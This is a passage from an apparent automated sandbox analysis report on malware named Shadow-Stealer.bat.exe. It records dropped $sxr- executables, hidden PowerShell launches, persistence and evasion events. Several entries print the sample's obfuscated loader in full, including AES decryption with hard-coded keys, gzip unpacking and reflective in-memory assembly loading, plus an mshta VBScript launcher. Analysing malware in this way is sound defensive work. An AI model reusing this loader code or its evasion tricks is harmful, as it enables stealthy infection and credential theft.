'')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYB
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBJump to behavior
            Source: unknownProcess created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACE901870D push rcx; retf 003Fh10_2_000001ACE901870E
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2E950D push rcx; retf 003Fh10_2_000001ACEA2E950E
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A59870D push rcx; retf 003Fh13_2_000002155A59870E
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5C950D push rcx; retf 003Fh13_2_000002155A5C950E
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC5870D push rcx; retf 003Fh19_2_000001F5FDC5870E
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC8950D push rcx; retf 003Fh19_2_000001F5FDC8950E
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01659870D push rcx; retf 003Fh22_2_000002D01659870E
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165F950D push rcx; retf 003Fh22_2_000002D0165F950E
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01662870D push rcx; retf 003Fh22_2_000002D01662870E
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01668870D push rcx; retf 003Fh22_2_000002D01668870E
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0166E870D push rcx; retf 003Fh22_2_000002D0166E870E
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D01674870D push rcx; retf 003Fh22_2_000002D01674870E
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0167A870D push rcx; retf 003Fh22_2_000002D0167A870E
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F14F870D push rcx; retf 003Fh24_2_000002D6F14F870E
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F152950D push rcx; retf 003Fh24_2_000002D6F152950E
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FB870D push rcx; retf 003Fh25_2_0000014E41FB870E
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FE950D push rcx; retf 003Fh25_2_0000014E41FE950E
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B47870D push rcx; retf 003Fh26_2_000001D15B47870E
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B4A950D push rcx; retf 003Fh26_2_000001D15B4A950E
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CAE870D push rcx; retf 003Fh26_2_000001D15CAE870E
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CB4870D push rcx; retf 003Fh26_2_000001D15CB4870E
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CBA870D push rcx; retf 003Fh26_2_000001D15CBA870E
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15CC0870D push rcx; retf 003Fh26_2_000001D15CC0870E
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,10_2_00007FF64E1D1008
            Source: Shadow-Stealer.bat.exe.0.drStatic PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
            Source: $sxr-cmd.exe.3.drStatic PE information: section name: .didat

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\$sxr-mshta.exeExecutable created and started: C:\Windows\$sxr-cmd.exeJump to behavior
            Source: C:\Windows\$sxr-powershell.exeExecutable created and started: C:\Windows\$sxr-powershell.exeJump to behavior
            Source: unknownExecutable created and started: C:\Windows\$sxr-mshta.exe
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Windows\$sxr-cmd.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Windows\$sxr-powershell.exeJump to dropped file
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Shadow-Stealer.bat.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Windows\$sxr-mshta.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Windows\$sxr-cmd.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Windows\$sxr-powershell.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Windows\$sxr-mshta.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile deleted: c:\users\user\desktop\shadow-stealer.batJump to behavior
            Source: C:\Windows\$sxr-powershell.exeFile opened: C:\Windows\$sxr-powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
